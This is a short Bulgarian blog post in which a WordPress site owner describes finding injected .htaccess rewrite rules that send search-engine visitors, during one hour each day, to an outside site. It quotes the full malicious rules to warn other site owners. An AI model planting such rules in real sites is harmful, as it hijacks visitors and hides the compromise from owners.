htaccess хак за WordPress
Докато правих проучване за позицията ми в Google, останових, че всеки резултат за моя сайт се пренасочва към save-darina.org. Преди известно време се беше получило подобно нещо, но го отдадох на някаква моментна грешка на сървъра. Уви, явно точно в този ден сайтът ми е бил хакнат.
Погледнах .htaccess файла, в който се очаква да има само правилата за WordPress и видях, че освен тях има и следното:
RewriteEngine On
RewriteCond %{TIME_HOUR}%{TIME_MIN} >1600
RewriteCond %{TIME_HOUR}%{TIME_MIN} <1700
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*search.*
RewriteRule ^(.*)$ http://bgmirror.atspace.com/ [L]
Което ще рече, че всички посещения между 16:00 и 17:00, който идват от Google, Yahoo, Live Search, MSN и Search, ще бъдат пренасочени към http://bgmirror.atspace.com/, който явно от своя страна пренасочва към save-darina.org. След бързо проучване се оказа, че това е сравнително известен хак и доста сайтове са били хакнати по този начин.
Ако ползваш WordPress като CMS или блог платформа, може би е добра идея да провериш htaccess файла си за подобен код, тъй като сайтът ти може да е хакнат, а дори да не си разбрал.